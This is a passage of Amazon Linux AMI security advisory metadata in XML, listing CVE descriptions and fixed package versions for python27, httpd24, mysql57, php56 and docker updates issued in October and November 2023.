</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43786" title="" id="CVE-2023-43786" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43787" title="" id="CVE-2023-43787" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43789" title="" id="CVE-2023-43789" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXpm-debuginfo" version="3.5.10" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-debuginfo-3.5.10-2.12.amzn1.x86_64.rpm</filename></package><package name="libXpm" version="3.5.10" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-3.5.10-2.12.amzn1.x86_64.rpm</filename></package><package name="libXpm-devel" version="3.5.10" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-devel-3.5.10-2.12.amzn1.x86_64.rpm</filename></package><package name="libXpm-debuginfo" version="3.5.10" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-debuginfo-3.5.10-2.12.amzn1.i686.rpm</filename></package><package name="libXpm-devel" version="3.5.10" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-devel-3.5.10-2.12.amzn1.i686.rpm</filename></package><package name="libXpm" version="3.5.10" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-3.5.10-2.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1876</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1876: important priority package update for python27</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-40217:
An issue was discovered in Python before 3.8.18, 3.9.x before 3.9.18, 3.10.x before 3.10.13, and 3.11.x before 3.11.5. It primarily affects servers (such as HTTP servers) that use TLS client authentication. If a TLS server-side socket is created, receives data into the socket buffer, and then is closed quickly, there is a brief window where the SSLSocket instance will detect the socket as "not connected" and won't initiate a handshake, but buffered data will still be readable from the socket buffer. This data will not be authenticated if the server-side TLS peer is expecting client certificate authentication, and is indistinguishable from valid TLS stream data. Data is limited in size to the amount that will fit in the buffer. (The TLS connection cannot directly be used for data exfiltration because the vulnerable code path requires that the connection be closed on initialization of the SSLSocket.)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40217" title="" id="CVE-2023-40217" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-devel" version="2.7.18" release="2.148.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-2.148.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.148.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-2.148.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="2.148.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-2.148.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.148.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-2.148.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.148.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-2.148.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.148.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-2.148.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.148.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-2.148.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="2.148.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-2.148.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.148.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-2.148.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.148.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-2.148.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.148.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-2.148.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.148.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-2.148.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1877</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1877: important priority package update for httpd24</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-45802:
Description
A flaw was found in mod_http2. When a HTTP/2 stream is reset (RST frame) by a client, there is a time window were the request's memory resources were not reclaimed immediately. Instead, de-allocation was deferred to connection close. A client could send new requests and resets, keeping the connection busy and open, causing the memory footprint to keep on growing. On connection close, all resources are reclaimed but the process might run out of memory before connection close.
Statement
During "normal" HTTP/2 use, the probability of encountering this issue is very low. The kept memory would not become noticeable before the connection closes or times out.
Mitigation
Mitigation for this issue is either not available or the currently available options don't meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
CVE-2023-43622:
A flaw was found in httpd. This flaw allows an attacker opening an HTTP/2 connection with an initial window size of 0 to block handling of that connection indefinitely in the Apache HTTP Server. This vulnerability can exhaust worker resources in the server, similar to the well-known "slow loris" attack pattern.
CVE-2023-31122:
Out-of-bounds Read vulnerability in mod_macro of Apache HTTP Server.This issue affects Apache HTTP Server: through 2.4.57.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31122" title="" id="CVE-2023-31122" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43622" title="" id="CVE-2023-43622" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45802" title="" id="CVE-2023-45802" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_ssl" version="2.4.58" release="1.101.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.58" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.58" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.58" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.58" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.58" release="1.101.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.58" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.58" release="1.101.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.58-1.101.amzn1.noarch.rpm</filename></package><package name="httpd24-tools" version="2.4.58" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.58" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.58-1.101.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.58" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.58" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.58" release="1.101.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.58" release="1.101.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.58" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.58" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.58" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.58" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.58-1.101.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.58" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.58-1.101.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1878</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1878: medium priority package update for mysql57</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:57:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-22053:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Client programs). Supported versions that are affected are 5.7.42 and prior and 8.0.33 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server and unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 5.9 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22053" title="" id="CVE-2023-22053" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-common" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.43" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.43-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.43-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.43" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.43-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1879</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1879: important priority package update for php56</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0662:
In PHP 8.0.X before 8.0.28, 8.1.X before 8.1.16 and 8.2.X before 8.2.3, excessive number of parts in HTTP form upload can cause high resource consumption and excessive number of log entries. This can cause denial of service on the affected server by exhausting CPU resources or disk space.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0662" title="" id="CVE-2023-0662" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-mbstring" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.40" release="1.144.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.40-1.144.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.40-1.144.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.40" release="1.144.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.40-1.144.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1880</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1880: important priority package update for python27</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 18:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48565:
An XML External Entity (XXE) issue was discovered in Python through 3.9.1. The plistlib module no longer accepts entity declarations in XML plist files to avoid XML vulnerabilities.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48565" title="" id="CVE-2022-48565" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-tools" version="2.7.18" release="2.149.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-2.149.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.149.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-2.149.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.149.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-2.149.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.149.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-2.149.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.149.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-2.149.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="2.149.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-2.149.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.149.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-2.149.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.149.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-2.149.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="2.149.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-2.149.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.149.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-2.149.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.149.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-2.149.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.149.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-2.149.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1881</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1881: important priority package update for docker</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 18:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-41723:
http2/hpack: avoid quadratic complexity in hpack decoding
